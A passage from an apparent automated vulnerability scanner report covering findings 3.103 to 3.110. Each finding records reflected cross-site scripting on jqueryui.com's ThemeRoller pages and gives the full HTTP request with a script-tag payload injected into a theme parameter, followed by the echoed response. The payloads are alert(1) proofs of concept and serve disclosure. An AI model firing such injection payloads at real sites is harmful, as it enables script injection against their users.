a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=3054d46"><script>alert(1)</script>95af9515bdf&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.103. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1420"><script>alert(1)</script>4061fcc75d1 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxe1420"><script>alert(1)</script>4061fcc75d1&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxe1420"><script>alert(1)</script>4061fcc75d1&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.104. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorActive request parameter is copied into the HTML document as plain text between tags. The payload 6bbb3<script>alert(1)</script>675b0118a3b was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response. Note that for this endpoint the response is served with Content-Type: text/css and the reflection lands inside the leading /* ... */ comment of the generated stylesheet, so whether a browser actually executes the injected script depends on whether it honours the declared content type rather than sniffing the body as HTML; the unescaped reflection itself is what the finding records.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d6bbb3<script>alert(1)</script>675b0118a3b HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:37 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17360


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d6bbb3<script>alert(1)</script>675b0118a3b
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget select, .ui-widget textarea, .ui-
...[SNIP]...

3.105. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorContent request parameter is copied into the HTML document as plain text between tags. The payload c277b<script>alert(1)</script>b32dc126929 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffffc277b<script>alert(1)</script>b32dc126929&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:31 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17360


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
l&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffffc277b<script>alert(1)</script>b32dc126929&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&border
...[SNIP]...

3.106. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorDefault request parameter is copied into the HTML document as plain text between tags. The payload ccd97<script>alert(1)</script>2206962d927 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6ccd97<script>alert(1)</script>2206962d927&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:33 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17360


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6ccd97<script>alert(1)</script>2206962d927&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColor
...[SNIP]...

3.107. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorHeader request parameter is copied into the HTML document as plain text between tags. The payload a0dc9<script>alert(1)</script>878d7895937 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccca0dc9<script>alert(1)</script>878d7895937&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:29 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17360


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccca0dc9<script>alert(1)</script>878d7895937&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&bo
...[SNIP]...

3.108. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorHighlight request parameter is copied into the HTML document as plain text between tags. The payload fa7d5<script>alert(1)</script>545e47e1537 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7efa7d5<script>alert(1)</script>545e47e1537 HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e"><script>alert(1)</script>7a510e251a9&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:53:04 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17499


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7efa7d5<script>alert(1)</script>545e47e1537
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget select, .ui-widget textarea, .ui-
...[SNIP]...

3.109. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorHover request parameter is copied into the HTML document as plain text between tags. The payload 7eb5f<script>alert(1)</script>3fe933a5c28 was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada7eb5f<script>alert(1)</script>3fe933a5c28&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:35 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17360


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
cContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada7eb5f<script>alert(1)</script>3fe933a5c28&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d
*/


/* Component containers
----------------------------------*
...[SNIP]...

3.110. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the HTML document as plain text between tags. The payload f1d3b<script>alert(1)</script>6b6c02a5e90 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

